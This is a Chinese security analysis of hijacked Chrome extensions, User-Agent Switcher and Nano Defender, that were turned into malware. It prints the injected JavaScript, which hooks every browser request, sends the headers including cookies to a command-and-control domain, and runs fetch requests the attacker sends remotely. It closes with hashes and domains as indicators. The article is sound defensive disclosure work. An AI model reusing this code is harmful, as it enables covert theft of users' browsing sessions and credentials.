作者:gaoya
原文链接:http://noahblog.360.cn/ua-switcher/
近日,有reddit用户反映,拥有100k+安装的Google Chrome扩展程序 User-Agent Switcher存在恶意点赞facebook/instagram照片的行为。
除User-Agent Switcher以外,还有另外两个扩展程序也被标记为恶意的,并从Chrome商店中下架。
目前已知受影响的扩展程序以及版本:
目前,Google已将相关扩展程序从 Web Store 中删除。Firefox插件则不受影响。
Chrome Webstore显示的各扩展程序的安装量如下:
360安全大脑显示,国内已有多位用户中招。我们尚不清楚有多少人安装了受影响的扩展程序,但从国外社区反馈来看,安装相关插件的用户不在少数,考虑到安装基数,我们认为此次事件影响较为广泛,请广大Chrome用户提高警惕,对相关扩展程序进行排查,以防被恶意组织利用。
国外社区用户和研究者报告了User-Agent Switcher随机点赞facebook/Instagram照片的行为,虽然我们目前还没有看到有窃取密码或远程登录的行为,但是考虑到这些插件能够收集浏览器请求头(其中也包括cookies),我们可以合理推测,攻击者是能够利用收集到的信息进行未授权登录的。为了防止更进一步危害的发生,我们在此建议受影响的Chrome用户:
background/connection.js
)影响版本:2.0.0.9, 2.0.1.0
User-Agent Switcher 2.0.0.8与2.0.0.9版本的文件结构完全相同,攻击者仅修改了其中两个文件:js/background.min.js
和js/JsonValues.min.js
。
三个版本文件大小有所不同
文件结构相同
js/background.min.js
中定义了扩展程序的后台操作。
攻击者修改的部分代码
完整代码如下所示。
// 完整代码
// 发起到 C2 的连接
var userAgent = io("https://www.useragentswitch.com/");
async function createFetch(e) {
let t = await fetch(e.uri, e.attr),
s = {};
return s.headerEntries = Array.from(t.headers.entries()),
s.data = await t.text(),
s.ok = t.ok,
s.status = t.status,
s
}
// 监听“createFetch”事件
userAgent.on("createFetch", async function (e) {
let t = await createFetch(e);
userAgent.emit(e.callBack, t)
});
handlerAgent = function (e) {
return -1 == e.url.indexOf("useragentswitch") && userAgent.emit("requestHeadersHandler", e), {
requestHeaders: JSON.parse(JSON.stringify(e.requestHeaders.reverse()).split("-zzz").join(""))
}
};
// hook浏览器请求
chrome.webRequest.onBeforeSendHeaders.addListener(handlerAgent, {
urls: ["<all_urls>"]
}, ["requestHeaders", "blocking", "extraHeaders"]);
1234567891011121314151617181920212223242526
攻击者添加的代码中定义了一个到 https://www.useragentswitch.com
的连接,并hook了浏览器的所有网络请求。当url中未包含 useragentswitch
时,将请求头编码后发送到C2。除此之外,当js代码接收到“createFetch”事件时,会调用 createFetch
函数,从参数中获取uri等发起相应请求。
由此我们推测,如果用户安装了此插件,C2通过向插件发送“createFetch”事件,使插件发起请求,完成指定任务,例如reddit用户提到的facebook/instagram点赞。攻击者能够利用此种方式来获利。
插件发起的网络请求(图片来自reddit)
在处理hook的请求头时,js代码会替换掉请求头中的 -zzz
后再发送,但我们暂时无法得知这样操作的目的是什么。
User-Agent Switcher 2.0.0.9 和 2.0.1.0 版本几乎相同,仅修改了 js/background.min.js
文件中的部分代码顺序,在此不做多述。
js/JsonValues.min.js
中原本为存储各UserAgent的文件。攻击者在文件后附加了大量js代码。经过分析,这些代码为混淆后的socketio客户端。
攻击者添加的js代码
影响版本:15.0.0.206
在Nano Defender中,攻击者同样修改了两个文件:
background/connection.js
background/core.js
12
其中,background/connection.js
为新增的文件,与User-Agent Switcher中的 js/JsonValues.min.js
相同,为混淆后的socketio客户端。
background/core.js
与User-Agent Switcher中的 js/background.min.js
相似,同样hook浏览器的所有请求并发送至C2(https://def.dev-nano.com/
),并监听dLisfOfObject
事件,发起相应请求。
background/core.js 部分修改代码
与User-Agent Switcher不同的是,在将浏览器请求转发至C2时,会使用正则过滤。过滤原则为C2返回的listOfObject
,如果请求头满足全部条件,则转发完整的请求头,否则不予转发。
可以看出,攻击者对原本的转发策略进行了优化,从最初的几乎全部转发修改为过滤转发,这使得攻击者能够更为高效地获取感兴趣的信息。
同样地,core.js
在发送请求头之前,会删除请求头中的-zzz
字符串。只是这次core.js
做了简单混淆,使用ASCII数组而非直接的-zzz
字符串。
var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join("");
var replacer = JSON.parse(replacerConcat);
return {
requestHeaders: replacer
}
12345678
uBlock的开发者gorhill对此代码进行了比较详细的分析,我们在此不做赘述。
影响版本:未知
尽管有报告提到,Nano Adblocker 1.0.0.154 版本也被植入了恶意代码,但是我们并没有找到此版本的扩展程序文件以及相关资料。尽管该扩展程序已被下架,我们仍旧无法确认Google商店中的插件版本是否为受影响的版本。第三方网站显示的版本历史中的最后一次更新为2020年8月26日,版本号为1.0.0.153。
Nano Adblocker 更新历史
由于各插件已被Google下架,我们无法从官方商店获取插件详情。根据第三方网站,User-Agent Switcher 版本历史如下:
可以看到,第一个存在恶意功能的插件版本2.0.0.9更新日期为2020年8月29日,而插件连接域名useragentswitch[.]com注册时间为2020年8月28日。
第三方网站显示的 Nano Defender 版本历史显示,攻击者在2020年10月15日在Google Web Store上更新了15.0.0.206版本,而C2域名dev-nano.com
注册时间为2020年10月11日。
我们对比了User-Agent Switcher和Nano Defender的代码。其中,js/background.js
(from ua switcher)和background/core.js
(from nano defender) 两个文件中存在相同的代码。
左图为ua switcher 2.0.0.9新增的部分代码,右图为nano defender新增的部分代码
可以看到,两段代码几乎完全相同,仅对变量名称、代码布局有修改。此外,两段代码对待转发请求头的操作相同:都替换了请求头中的-zzz
字符串。
左图为ua switcher 2.0.0.9,右图为nano defender
由此,我们认为,两个(或三个)扩展程序的始作俑者为同一人。
Nano Defender新开发者创建了自己的项目。目前该项目以及账户(nenodevs)均已被删除,因此我们无法从GitHub主页获取到有关他们的信息。
攻击者使用的两个域名都是在插件上架前几天注册的,开启了隐私保护,并利用CDN隐藏真实IP,而他们在扩展程序中使用的C2地址 www.useragentswitch.com
和 www.dev-nano.com
目前均指向了namecheap的parkingpage。
图片来自360netlab
Nano Defender原作者称新开发者是来自土耳其的开发团队,但是我们没有找到更多的信息证实攻击者的身份。
攻击者利用此类插件能达成的目的有很多。攻击者通过请求头中的cookie,能够获取会话信息,从而未授权登录;如果登录银行网站的会话被截取,用户资金安全将难保。就目前掌握的证据而言,攻击者仅仅利用此插件随机点赞,而没有更进一步的操作。我们无法判断是攻击者本身目的如此,或者这只是一次试验。
窃取用户隐私的浏览器插件并不罕见。早在2017年,在v2ex论坛就有用户表示,Chrome中另一个名为 User-Agent Switcher
的扩展程序可能存在未授权侵犯用户隐私的恶意行为;2018年卡巴斯基也发布了一篇关于Chrome恶意插件的报告。由于Google的审核流程并未检测到此类恶意插件,攻击者仍然可以通过类似的手法进行恶意活动。
f45d19086281a54b6e0d539f02225e1c -> user-agent switcher 2.0.0.9 6713b49aa14d85b678dbd85e18439dd3 -> user-agent switcher 2.0.0.9 af7c24be8730a98fe72e56d2f5ae19db -> nano defender 15.0.0.206 useragentswitch.com dev-nano.com
https://www.reddit.com/r/chrome/comments/j6fvwm/extension_with_100k_installs_makes_your_chrome/
https://github.com/jspenguin2017/Snippets/issues/5
https://github.com/NanoAdblocker/NanoCore/issues/362
https://www.v2ex.com/t/389340?from=timeline&isappinstalled=0
本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1710/